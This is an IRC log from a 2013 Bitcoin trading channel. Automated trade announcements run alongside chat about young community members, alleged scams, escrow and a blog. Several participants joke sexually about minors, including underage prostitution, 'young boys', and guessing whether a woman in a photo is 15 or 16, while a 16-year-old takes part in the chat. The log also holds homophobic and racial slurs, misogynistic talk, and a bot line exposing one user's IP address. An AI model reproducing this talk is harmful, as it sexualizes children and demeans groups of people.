18:32:11 wow Jul 02 18:32:29 ;;us kako Jul 02 18:32:29 Error: "us" is not a valid command. Jul 02 18:32:34 ;;ud kako Jul 02 18:32:34 http://www.urbandictionary.com/define.php?term=kako | 1. kako. when someone yaks. when someone yaks. buy kako mugs & shirts. by Billy the Third Nov 7, 2003 add a video · advertise here. ©1999-2013 Urban ... Jul 02 18:32:36 Urban Dictionary: kako Jul 02 18:32:51 what Jul 02 18:33:49 [BTCTC] [AMC-PT] 50 @ 0.001998 = 0.0999 BTC [+] Jul 02 18:35:05 ;;ud peter Jul 02 18:35:05 http://www.urbandictionary.com/define.php?term=peter | A very sweet and thoughtful guy who is the ideal boyfriend. He can read others like a book and everyone looks to him for advice. He is dependable and looks out  ... Jul 02 18:35:06 Urban Dictionary: peter Jul 02 18:35:10 Quick question: Who has been the youngest Bitcoiner you have come across and what age were they? Jul 02 18:35:18 ;;ud pankkake Jul 02 18:35:19 http://www.urbandictionary.com/define.php?term=Pankkake | to cover a woman in pancake batter. People who have a food fetish tend to download pankkake porn. buy pankkake mugs & shirts. by James Bass Jan 23, 2004 ... Jul 02 18:35:21 Urban Dictionary: Pankkake Jul 02 18:35:44 matthew_boyd: do underage prostitutes count if paid in BTC ? Jul 02 18:35:56 davout: why not ;) Jul 02 18:36:06 ask mircea_popescu then Jul 02 18:36:27 :P Jul 02 18:37:59 No one know anyone young in Bitcoins? :) Jul 02 18:38:24 its a stupid question Jul 02 18:38:39 i can give a bitcoin to my brother who is 3 or 4 or something Jul 02 18:38:53 theres some preggy somewhere with a btc in her vagina, does that count? Jul 02 18:38:55 I'm pretty sure there's a lot of (active) young users Jul 02 18:39:00 Let's change it then, who is heavily involved? Jul 02 18:39:09 one of the reasons I stayed away from bitcoins for a while :p Jul 02 18:39:26 Huh, interesting... Jul 02 18:40:12 [BTCTC] [COGNITIVE] 1 @ 0.326 BTC [-] Jul 02 18:40:14 [BTCTC] [COGNITIVE] 1 @ 0.326 BTC [-] Jul 02 18:40:16 [BTCTC] [COGNITIVE] 3 @ 0.321 = 0.963 BTC [-] Jul 02 18:40:22 [HAVELOCK] [ASICM] 10 @ 0.0452 = 0.452 BTC [+] Jul 02 18:41:18 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] Jul 02 18:41:23 the COGNITIVE guy is 17 Jul 02 18:41:23 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] Jul 02 18:41:45 there's zhoutong Jul 02 18:42:03 haha. how old was he? Jul 02 18:42:08 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 02 18:42:11 17 i reckon Jul 02 18:42:17 Wow, that's impressive! Jul 02 18:42:25 what is ? Jul 02 18:42:36 Being that young and being so active in a community :) Jul 02 18:42:44 + loved by everyone :) Jul 02 18:42:57 lol Jul 02 18:43:23 who doesn't love the occasional asian young boy Jul 02 18:43:41 I'll drink to that ;) +1 Jul 02 18:44:59 [BTCTC] [BTC-BOND] 11 @ 0.009999 = 0.11 BTC [+] Jul 02 18:46:59 [BTCTC] [BASIC-MINING] 1 @ 0.166008 BTC [+] Jul 02 18:48:24 [BTCTC] [RSM] 5 @ 0.016001 = 0.08 BTC [-] Jul 02 18:49:20 [BTCTC] [S.BBET-PT] 90 @ 0.00196 = 0.1764 BTC [+] Jul 02 18:49:22 [BTCTC] [S.BBET-PT] 10 @ 0.00197 = 0.0197 BTC [+] Jul 02 18:49:53 [BTCTC] [BASIC-MINING] 2 @ 0.166008 = 0.332 BTC [+] Jul 02 18:50:14 17:42.21 ( davout ) what is ? Jul 02 18:50:19 so young and so scammy Jul 02 18:50:26 [BTCTC] [PAJKA.BOND] 10 @ 0.058799 = 0.588 BTC [+] Jul 02 18:50:38 hah Jul 02 18:51:04 goes for garr guy too Jul 02 18:51:04 i almost had a heart attack while skimming through bitcoinica's code Jul 02 18:51:14 [HAVELOCK] [ASICM] 1 @ 0.0452 BTC [+] Jul 02 18:51:28 i don't really remember forum ncks, but i sorta recall this one Jul 02 18:51:29 but dont worry davout, bitfinex is based on that code Jul 02 18:51:37 "They believe that the CE Zerification is non-complian and fictional. They also failed to have a EU conformity declaration and a user handbook with information." Jul 02 18:51:38 ouch Jul 02 18:51:42 I guess they delivered. Jul 02 18:51:47 [BTCTC] [DMS.SELLING] 13 @ 0.031988 = 0.4158 BTC [+] Jul 02 18:51:48 lol Jul 02 18:51:48 [BTCTC] [DMS.SELLING] 7 @ 0.031989 = 0.2239 BTC [+] Jul 02 18:52:09 he did fix a couple of things after i pwned it here and there, 10000x leverage wasn't really expected xD Jul 02 18:52:21 [BTCTC] [BASIC-MINING] 1 @ 0.166008 BTC [+] Jul 02 18:52:26 the global design is still broken though Jul 02 18:52:33 matthew_boyd the garr kid was what, 17 ? Jul 02 18:52:44 zhou was about the same at the time of the start of his infamous adventure Jul 02 18:52:57 who is garr? Jul 02 18:53:02 I think I saw him on the forums? Jul 02 18:53:17 Lately, he was bumping prices with an alt account, that the one? Jul 02 18:53:19 yeah, some kid ran a sort of pmb for a while Jul 02 18:53:19 [BTCTC] [AMC-PT] 15 @ 0.0018 = 0.027 BTC [-] Jul 02 18:53:25 garr255, Garret, operator of COGNITIVE Jul 02 18:53:26 [BTCTC] [DMS.MINING] 100 @ 0.01999 = 1.999 BTC [+] Jul 02 18:53:31 also got caught shill bidding his own auctions. by inaba lol Jul 02 18:53:38 yep Jul 02 18:53:54 Ah, seems like a bit of a faggot. Well, it would seem like young people get a bad name in this community.. Jul 02 18:53:58 and no, being young and "Active" is not impressive. Jul 02 18:54:03 Need to change this... :) Jul 02 18:54:06 this isn't the catholic church. Jul 02 18:54:19 hahahaha mircea_popescu, you made me laugh, +1 ;) Jul 02 18:54:31 matt how old are you? Jul 02 18:54:37 I am 16. :) Jul 02 18:54:51 come back, 20 yrs. Jul 02 18:55:16 Haha, I am trying to earn as much trust as possible, and try to make young people more accepted Jul 02 18:55:31 I recently did a 41btc escrow, and that was the first escrow I have ever done Jul 02 18:55:41 It's safe to say, I lost a lot of sleep over that one... Jul 02 18:56:17 [MPEX] [S.MPOE] 4350 @ 0.00083253 = 3.6215 BTC [+] Jul 02 18:56:26 matthew_boyd: lol, good one Jul 02 18:56:59 trying to make young people more accepted ? how's that go ? Jul 02 18:57:26 why lose sleep over escrow? Jul 02 18:57:28 Getting better! I have the sub-reddit which I told you about which I know a lot of younger people use as their source of income with bitcoins Jul 02 18:57:43 ThickAsThieves: if I lost 41 btc for someone I would literally just quit the internet. Jul 02 18:57:50 uhhh Jul 02 18:58:00 why;s it a question of if. Jul 02 18:58:13 and quantify "a lot" Jul 02 18:58:19 https://bitcointalk.org/index.php?topic=236310.msg2636320#msg2636320 Furuknap disclosing "insider trading" Jul 02 18:58:23 [ANN]BTCT:BFMINES - PMB - Escrow until operation start - Bonus divs first months Jul 02 18:58:44 mircea_popescu: what do you mean? Jul 02 18:58:49 ThickAsThieves wait what ?! Jul 02 18:59:12 i dunno, some nonsense Jul 02 18:59:14 matthew_boyd i mean why is losing other people's money a question of "if" and how many is "a lot of young users" Jul 02 18:59:35 "[FORHIRE] Former Bitspend CTO - Over 15+ years experience & knowledge of over 20 programming languages - Looking for new position or work" Jul 02 18:59:39 this is pretty rich. Jul 02 18:59:52 that's not insider trading, that's saying "buy my stuff because i am buying it too given so good it is" Jul 02 18:59:58 i.e. standard advertising Jul 02 19:00:16 nonsense basically Jul 02 19:00:19 [BTCTC] [BASIC-MINING] 1 @ 0.166007 BTC [-] Jul 02 19:00:40 [BTCTC] [B.YABMC] 10 @ 0.005901 = 0.059 BTC [+] Jul 02 19:01:03 "This is a self-moderated topic. Please ignore it." Jul 02 19:01:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.04747 = 0.1424 BTC [+] Jul 02 19:02:10 [BTCTC] [BASIC-MINING] 2 @ 0.166005 = 0.332 BTC [-] Jul 02 19:02:13 [BTCTC] [BTC-BOND] 50 @ 0.009999 = 0.5 BTC [+] Jul 02 19:02:29 mircea_popescu: It isn't really a question of "if" I was nervous, seeing that this was my first every escrow, understandably. "how many" I would say around 30 percent of the sub-reddit which isn't the worst... Jul 02 19:02:52 30% is not what i was looking for. 5 ? 2 ? 340 ? 154986754 ? Jul 02 19:03:08 Posts? Jul 02 19:03:19 pubic hairs Jul 02 19:03:25 "I have a lot of experience with german customs (through my job of importing stuff) and I know that this is a very serious condition right now. They think that you just "printed" the CE label and put it on their without checking your components..." Jul 02 19:03:28 ThickAsThieves: exactly three then Jul 02 19:03:36 duh. they THINK. as if that's somehow conceivably wrong. Jul 02 19:03:40 matthew_boyd no. how many people. Jul 02 19:04:03 [HAVELOCK] [ASICM] 21 @ 0.0452 = 0.9492 BTC [+] Jul 02 19:04:07 Oh sorry for the mixup, around 350-500 people? Jul 02 19:04:17 [BTCTC] [PAJKA.BOND] 2 @ 0.050001 = 0.1 BTC [-] Jul 02 19:04:30 hm. Jul 02 19:04:43 [BTCTC] [DMS.PURCHASE] 2 @ 0.046306 = 0.0926 BTC [+] Jul 02 19:04:44 [BTCTC] [BASIC-MINING] 3 @ 0.166002 = 0.498 BTC [-] Jul 02 19:04:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1983 BTC [-] Jul 02 19:05:08 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [-] Jul 02 19:06:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.045801 = 0.3206 BTC [-] Jul 02 19:06:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.04747 = 0.3323 BTC [+] Jul 02 19:07:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.04748 = 0.1899 BTC [+] Jul 02 19:07:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.047485 = 0.4749 BTC [+] Jul 02 19:07:04 Anyone else interested in the "Cat rich or fry trying" t-shirts? :) Jul 02 19:07:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.04749 BTC [+] Jul 02 19:07:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.047495 = 0.475 BTC [+] Jul 02 19:07:15 [BTCTC] [S.MPOE-PT] 26 @ 0.000999 = 0.026 BTC [-] Jul 02 19:07:17 they are okay Jul 02 19:07:24 but i like cats Jul 02 19:07:36 and anyone seeing me with such a shirt would be very confused Jul 02 19:07:58 Hahaha, I do think they are pretty good, seeing that you are a cat lover, I can see why you wouldn't snap one up immediately Jul 02 19:08:08 [BTCTC] [S.DICE-PT] 103 @ 0.0022 = 0.2266 BTC [-] Jul 02 19:08:18 ThickAsThieves: the rising bitcoin star Jul 02 19:08:27 You would have to go through the whole explanation to everyone which would be more hassle that it's worth to buy the t-shirt! Jul 02 19:08:32 decent charts http://runeks.dk/bitcoin/ Jul 02 19:08:34 [BTCTC] [PAJKA.BOND] 2 @ 0.050001 = 0.1 BTC [-] Jul 02 19:08:41 matthew_boyd sooo, do you want to be my reddit officer ? Jul 02 19:08:45 for asicminer that is. Jul 02 19:08:57 thestringpuller: huh? Jul 02 19:08:58 I wonder why PAJKA has so many ups and downs Jul 02 19:09:03 mircea_popescu: tell me what it entails and I'll consider it ;) Jul 02 19:09:21 you are one of the few successful asset managers Jul 02 19:09:26 you pick the important posts off http://trilema.com/ and post them to twitter. Jul 02 19:09:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.047495 = 0.1425 BTC [+] Jul 02 19:09:53 post them to twitter? :P Jul 02 19:09:56 Not reddit? Jul 02 19:10:13 slrry reddit Jul 02 19:10:19 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Jul 02 19:10:20 i keep confusing these mediathings Jul 02 19:10:21 mircea_popescu: I found a flaw in your game model Jul 02 19:10:24 Erm, sure Jul 02 19:10:34 matthew_boyd so what's it cost ? Jul 02 19:10:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.04747 = 0.1899 BTC [-] Jul 02 19:10:53 0 ;) You don't know me, I don't know you, we'll see later, how about that? Jul 02 19:10:58 works. Jul 02 19:11:17 thestringpuller aha ? Jul 02 19:11:22 is it going to make you cat rich ? Jul 02 19:11:43 looks like a troll site, but I'll run with it,and give you the benefit of the doubt... Jul 02 19:12:00 how the heck does it look like a troll site ?! Jul 02 19:12:32 "A somewhat smarmy, slightly gay “people person” (Tom Arnold) hits on a 7 year old girl in the street." Jul 02 19:12:40 I mean, not the most formal of statements. Jul 02 19:13:06 uh. Jul 02 19:13:17 ok, it's official, by now there exists no succession of words that's not on trilema. Jul 02 19:13:31 matthew_boyd of particular interest are the s.mg mpex and bitcoin categories. Jul 02 19:13:46 http://trilema.com/category/bitcoin/ http://trilema.com/category/mpex/ http://trilema.com/category/smg/ Jul 02 19:13:48 Bitcoin pe Trilema - Un blog de Mircea Popescu. Jul 02 19:13:51 yes yes. Jul 02 19:13:52 you are one of the few successful asset managers <<<< appreciate that you see it that way. I have a lot more planned but I'm working on a more comprehensive strategy to make sure I do it right. Or at least, do my best to do it right. Jul 02 19:14:28 mircea_popescu: so you are actually serious? Jul 02 19:14:32 I think that in a few mos from now, it'll probably be me and Deprived drawing the most fire. Jul 02 19:14:40 matthew_boyd yes. Jul 02 19:14:49 PM me on this then ;) Jul 02 19:15:18 ThickAsThieves i knew it from the moment i saw thieves in your name Jul 02 19:15:47 howdy Jul 02 19:15:54 not sure if that's a good thing or bad Jul 02 19:15:55 no u Jul 02 19:16:16 ThickAsThieves after pirate collapsed, idiot forumers were like "oh but OF COURSE it was not serious. it had pirate in the name" Jul 02 19:16:33 after glbse imploded same sort of idiot was "like how could you trust a gay named nefario lawl" Jul 02 19:16:49 so you think that'll be me one day? Jul 02 19:16:54 yep Jul 02 19:17:03 the logic is flawless ThickAsThieves Jul 02 19:17:06 lol Jul 02 19:17:09 it HASTO Be. Jul 02 19:17:40 the priate got like 300 of my bitcoins Jul 02 19:17:44 if it MUST be, it won't be for lack of me trying to avoid it Jul 02 19:17:44 that pirate fucker Jul 02 19:18:27 maybe i'll even implement AN0 Jul 02 19:18:27 pirate was waaay ahead of you guys in web and ui dev Jul 02 19:18:33 it was a really evil trick Jul 02 19:18:51 html5 this Jul 02 19:19:00 and such Jul 02 19:19:08 can never trust another website now Jul 02 19:19:20 so far my assets are all "provably fair" at least ;) Jul 02 19:19:45 in retrospect he must have spent all of our bitcoins on web developers in india Jul 02 19:20:03 web developers in india can be paid like nothing Jul 02 19:20:20 yeah bitcoins were $5 at the time Jul 02 19:20:25 coincidentally, my design abilities are notable... Jul 02 19:21:22 then we need the ThickAsThieves bank and trust Jul 02 19:21:32 i'll shill for you Jul 02 19:21:48 shame. Jul 02 19:22:39 [BTCTC] [ASICMINER-PT] 1 @ 4.749 BTC [+] Jul 02 19:22:41 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 02 19:22:43 [BTCTC] [ASICMINER-PT] 1 @ 4.798 BTC [+] Jul 02 19:22:49 any word on sdice dividend yet ? Jul 02 19:23:55 ThickAsThieves i think you're missing the point where what ppl state on btctalk and reality lack any connectivity Jul 02 19:24:27 [HAVELOCK] [VTX] 2 @ 0.5178 = 1.0356 BTC [+] Jul 02 19:24:35 where did btctalk come into this? Jul 02 19:24:46 mp loves the dramatalk.org Jul 02 19:24:55 " idiot forumers " was your hint Jul 02 19:25:28 ah Jul 02 19:25:50 [HAVELOCK] [ASICM] 67 @ 0.0452 = 3.0284 BTC [+] Jul 02 19:25:56 well, regardless, I could've chosen a more convenient handle... Jul 02 19:26:10 nah it works well i think Jul 02 19:28:53 could be worse... Jul 02 19:30:25 [BTCTC] [BASIC-MINING] 1 @ 0.16535 BTC [-] Jul 02 19:31:14 [BTCTC] [S.DICE-PT] 897 @ 0.0022 = 1.9734 BTC [-] Jul 02 19:31:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.047499 = 0.1425 BTC [+] Jul 02 19:31:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.047499 = 0.19 BTC [+] Jul 02 19:33:45 [HAVELOCK] [ASICM] 115 @ 0.0452 = 5.198 BTC [+] Jul 02 19:33:52 we gotta resurrect the weasel sometime. Jul 02 19:34:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0475 = 0.095 BTC [+] Jul 02 19:37:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0475 = 0.095 BTC [+] Jul 02 19:38:16 http://imgur.com/a/NAWar Jul 02 19:38:18 small bra - Imgur Jul 02 19:38:20 aye or nay ? Jul 02 19:39:49 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 02 19:39:54 hard to tell whether that's 15yo or not... Jul 02 19:40:32 lol Jul 02 19:40:36 my computer won't even load it Jul 02 19:40:38 [BTCTC] [ASICMINER-PT] 7 @ 4.64002 = 32.4801 BTC [-] Jul 02 19:41:53 [BTCTC] [ASICMINER-PT] 2 @ 4.797 = 9.594 BTC [+] Jul 02 19:42:34 kinda lanky for a 16yo Jul 02 19:42:36 but perhaps Jul 02 19:42:38 [BTCTC] [DMS.SELLING] 20 @ 0.030804 = 0.6161 BTC [-] Jul 02 19:42:40 [BTCTC] [DMS.SELLING] 10 @ 0.030803 = 0.308 BTC [-] Jul 02 19:42:41 [BTCTC] [DMS.SELLING] 9 @ 0.030801 = 0.2772 BTC [-] Jul 02 19:42:42 [BTCTC] [DMS.SELLING] 55 @ 0.0308 = 1.694 BTC [-] Jul 02 19:42:43 [BTCTC] [DMS.SELLING] 6 @ 0.0293 = 0.1758 BTC [-] Jul 02 19:42:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.04749 = 0.4274 BTC [-] Jul 02 19:43:01 http://imgur.com/a/gYKZL Jul 02 19:43:06 looks moar like 20 tbh Jul 02 19:43:10 [HAVELOCK] [ASICM] 400 @ 0.045 = 18 BTC [-] Jul 02 19:43:19 [BTCTC] [TAT.ASICMINER] 30 @ 0.04749 = 1.4247 BTC [-] Jul 02 19:43:55 20 year olds are annoying Jul 02 19:44:06 Bath - Imgur Jul 02 19:44:07 why ?! Jul 02 19:44:09 anyone under 23 is still a child Jul 02 19:44:17 [BTCTC] [BASIC-MINING] 6 @ 0.16535 = 0.9921 BTC [-] Jul 02 19:44:32 they complain about random shit and rarely contribute anything useful to society Jul 02 19:44:45 waaah retail labor is too beneath me Jul 02 19:44:57 waaaah i'm going to send out mixed signals to all the guys Jul 02 19:45:15 waaah I want a good relationship why do guys use and dispose of me when I put out Jul 02 19:45:18 waaaah Jul 02 19:45:18 you know i keep slaves. they're antithetical to your description. Jul 02 19:45:21 [BTCTC] [DMS.PURCHASE] 130 @ 0.049338 = 6.4139 BTC [+] Jul 02 19:45:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.04749 = 0.9498 BTC [-] Jul 02 19:45:33 are they in cages? Jul 02 19:45:39 [BTCTC] [ASICMINER-PT] 2 @ 4.795 = 9.59 BTC [-] Jul 02 19:45:46 or do they do useful things for you in exchange for sex? Jul 02 19:45:53 if it's the latter they are whores not slaves Jul 02 19:46:01 they can be in cages. they do useful things as part of being slaves. Jul 02 19:46:51 believe it or not plenty of young women both recognise and loathe the stereotype you describe Jul 02 19:47:41 yet an aspiring journalist will sleep with politicians to get ahead Jul 02 19:47:56 i don't see your point :P Jul 02 19:48:26 ;;bcregister Jul 02 19:48:27 (bcregister ) -- Register your identity, associating bitcoin address key with . should be a standard-type bitcoin address, starting with 1. You will be given a random passphrase to sign with your address key, and submit to the bot with the 'bcverify' command. Your passphrase will expire in 10 minutes. Jul 02 19:48:37 what's wrong with sleeping with people now Jul 02 19:48:49 sleeping with people is completely fine Jul 02 19:48:59 [BTCTC] [S.MPOE-PT] 1 @ 0.001 BTC [+] Jul 02 19:49:01 sleeping with someone to get something out of it makes you a whore Jul 02 19:49:15 not that a whore is good or bad Jul 02 19:49:22 so it's ok as long as the guy doesn't ejaculate ? Jul 02 19:49:29 LOL Jul 02 19:49:31 well ? Jul 02 19:49:36 ;;bcregister matthew_boyd 169iA76RmnatFXmEthT6AEehxMQ9X1ro3L Jul 02 19:49:36 Request successful for user matthew_boyd, hostmask matthew_boyd!519fee4e@gateway/web/freenode/ip.81.159.238.78. Your challenge string is: freenode:#bitcoin-otc:7c69b5de91f126915bf512edaa97dc2a0d8c24deb9483ca82fb837b4 Jul 02 19:49:37 i get something out of it everytime, am i a whore? Jul 02 19:49:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1982 BTC [-] Jul 02 19:49:51 nice play on my words Jul 02 19:49:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1981 BTC [-] Jul 02 19:49:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19805 BTC [-] Jul 02 19:49:55 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19805 = 0.3961 BTC [-] Jul 02 19:49:56 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198 BTC [-] Jul 02 19:49:58 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198 BTC [-] Jul 02 19:49:59 [BTCTC] [CRYPTO-TRADE] 2 @ 0.198 = 0.396 BTC [-] Jul 02 19:49:59 it's all i got. Jul 02 19:50:00 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Jul 02 19:50:01 it only superficially seems a play on words tho. Jul 02 19:50:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198 BTC [-] Jul 02 19:50:02 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Jul 02 19:50:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198 BTC [-] Jul 02 19:50:07 ;;balance 169iA76RmnatFXmEthT6AEehxMQ9X1ro3L Jul 02 19:50:08 0.03687289 Jul 02 19:50:08 [BTCTC] [CRYPTO-TRADE] 20 @ 0.198 = 3.96 BTC [-] Jul 02 19:50:09 a person who sleeps with someone to get leverage afterwards is a whore Jul 02 19:50:09 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1979 BTC [-] Jul 02 19:50:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1978 BTC [-] Jul 02 19:50:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1977 BTC [-] Jul 02 19:50:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1976 BTC [-] Jul 02 19:50:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1975 BTC [-] Jul 02 19:50:18 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1975 = 0.395 BTC [-] Jul 02 19:50:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1974 BTC [-] Jul 02 19:50:21 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1973 BTC [-] Jul 02 19:50:22 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1972 BTC [-] Jul 02 19:50:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1971 BTC [-] Jul 02 19:50:25 how do you know they're not enjoying fucking the politician. Jul 02 19:50:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1971 BTC [-] Jul 02 19:50:27 i'd call them a pro. Jul 02 19:50:40 XD Jul 02 19:50:45 nice one deadweasel Jul 02 19:51:03 so what is your point mircea_popescu girls don't like being called whores? or they don't like being whores? Jul 02 19:51:29 my point is that presuming a girl's a whore on the thin basis of a) she's not fucking you and b) the guy she's fucking owns shit Jul 02 19:51:37 seems wildly infantile to me Jul 02 19:52:31 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 02 19:53:27 wild infants, the worst kind Jul 02 19:53:54 my whore girlfriend thinks I'm emotionally unavailable. I think she's just a dumb whore. Jul 02 19:54:38 deadweasel http://userserve-ak.last.fm/serve/_/10104037/Stupid+Whore+EP.jpg Jul 02 19:55:19 lol, I kid. she's alright. Jul 02 19:55:46 LOL mircea_popescu how are you misconstruding what I'm saying? Jul 02 19:56:02 [BTCTC] [ASICMINER-PT] 1 @ 4.700001 BTC [+] Jul 02 19:56:12 1) a slave does something for nothing Jul 02 19:56:20 2) a whore does not do something for nothing Jul 02 19:56:32 apples and oranges mah nigga Jul 02 19:56:44 well... complicated. the nothing's never really nothing, the something's always dubious, it's endless. Jul 02 19:56:53 but yeah, perhaps we got confused Jul 02 19:57:03 but what if slave got his satisfaction being a slave Jul 02 19:57:11 then he is not a slave and didnt get the satisfaction Jul 02 19:57:16 right ? Jul 02 19:57:17 so how can he be a slave? Jul 02 19:57:35 doesn't that make him a slave who doesn't know he's a slave Jul 02 19:57:43 or are we in aldous huxely's brave new world? Jul 02 19:57:51 salving used to be so simple Jul 02 19:57:53 we're in itscomplicandia Jul 02 19:57:54 slaving Jul 02 19:58:00 an island far far away right here. Jul 02 19:58:18 and epsilon enjoys pulling a lever, for all his life Jul 02 19:58:25 where's the romance? Jul 02 19:58:31 in the pie Jul 02 19:58:33 fuck romance Jul 02 19:58:39 conditioned bullshit Jul 02 19:58:41 ;;google hawt romance Jul 02 19:58:42 Sex in Science Fiction Romance ~ Jessica E. Subject | Hawt Reads ...: ; Finding Forever In Romance: Hawt angsty Romance!: ; Some Hot Paranormal Romance Series | Parajunkee's View: (1 more message) Jul 02 19:58:45 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 02 19:58:54 expensive too Jul 02 19:59:04 deadweassel sounds like you need a new woman Jul 02 19:59:19 http://www.google.com/search?q=naked+romance&complete=0&source=lnms&tbm=isch Jul 02 19:59:20 romance aside Jul 02 19:59:23 actuallty this isn't so bad. Jul 02 19:59:32 she doens't need any of that, but she all the american woman conditioned stuff. I'm in the market for an import. Jul 02 19:59:52 lol http://naturism-nudism.org/wp-content/uploads/2011/11/Nudist-Documentary-Video-Gimnastele-Romance-Nude.jpg Jul 02 20:00:35 damn I wish I wasn't at work. i love nudists. Jul 02 20:01:12 so move. Jul 02 20:01:19 you are free to show your breasts at least Jul 02 20:01:26 yes. i am. Jul 02 20:02:04 i just want my junk to get a little sun. maybe it will grow bigger with more sun? ;) Jul 02 20:02:17 they have fabroc for that Jul 02 20:02:19 fabric Jul 02 20:02:23 that lets sun in Jul 02 20:02:37 i think Jul 02 20:02:40 it's crap, tried it like 10 years ago. Jul 02 20:02:55 so get a back yard Jul 02 20:03:14 and a pool Jul 02 20:03:19 and nude it up Jul 02 20:03:21 Come back to this chat and I am very very lost. Jul 02 20:03:26 solution is incoming, but undefined at the moment. Also, it's not hugely important. just a perk. **** BEGIN LOGGING AT Tue Jul 2 20:10:29 2013 Jul 02 20:10:47 hm, was deadweasel the guy that got all excited over my garden of eden post ? Jul 02 20:15:15 [BTCTC] [AMC-PT] 1 @ 0.001995 BTC [+] Jul 02 20:17:56 [BTCTC] [AMC-PT] 749 @ 0.001995 = 1.4943 BTC [+] Jul 02 20:18:18 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jul 02 20:21:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.04655 BTC [-] Jul 02 20:21:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.0458 = 0.1832 BTC [-] Jul 02 20:23:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0458 BTC [-] Jul 02 20:23:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.0455 = 0.2275 BTC [-] Jul 02 20:23:31 [HAVELOCK] [ASICM] 33 @ 0.04535 = 1.4966 BTC [+] Jul 02 20:24:15 [BTCTC] [S.MPOE-PT] 49 @ 0.000999 = 0.049 BTC [-] Jul 02 20:33:28 hi any news on sdice or bbet dividend for this month fellas? Jul 02 20:35:08 TraderJim: Profit : 8.80204166 BTC to be distributed as dividends. http://trilema.com/2013/bitbet-june-2013-statement/ Jul 02 20:35:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.047 = 0.141 BTC [+] Jul 02 20:35:26 [BTCTC] [TAT.ASICMINER] 71 @ 0.047 = 3.337 BTC [+] Jul 02 20:35:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.047132 BTC [+] Jul 02 20:35:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0472 BTC [+] Jul 02 20:35:29 [BTCTC] [TAT.ASICMINER] 14 @ 0.0475 = 0.665 BTC [+] Jul 02 20:36:22 [MPEX] [S.MPOE] 3150 @ 0.0008289 = 2.611 BTC [-] Jul 02 20:38:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.047132 BTC [-] Jul 02 20:38:41 [BTCTC] [DMS.MINING] 2 @ 0.020499 = 0.041 BTC [+] Jul 02 20:38:52 yeah going out today Jul 02 20:41:14 [HAVELOCK] [ASICM] 3 @ 0.04475 = 0.1343 BTC [-] Jul 02 20:41:16 [HAVELOCK] [HIM] 2 @ 0.31 = 0.62 BTC [+] Jul 02 20:41:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.047132 = 0.2828 BTC [-] Jul 02 20:42:17 [MPEX] [S.MPOE] 4650 @ 0.00083253 = 3.8713 BTC [+] Jul 02 20:47:47 [BTCTC] [S.DICE-PT] 75 @ 0.002101 = 0.1576 BTC [-] Jul 02 20:47:49 [BTCTC] [S.DICE-PT] 25 @ 0.0021 = 0.0525 BTC [-] Jul 02 20:47:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jul 02 20:49:17 [HAVELOCK] [HIM] 1 @ 0.318 BTC [+] Jul 02 20:49:34 since people were asking for screenshots : http://trilema.com/2013/statements-regarding-the-mmorpg-under-development-i-v/#comment-93797 Jul 02 20:51:23 hi mircea Jul 02 20:52:45 heya Jul 02 20:53:26 neat' Jul 02 20:53:29 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.00466 = 0.0513 BTC [+] Jul 02 20:53:54 [BTCTC] [RSM] 50 @ 0.016001 = 0.8001 BTC [-] Jul 02 20:54:10 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.00466 = 0.0652 BTC [+] Jul 02 20:54:12 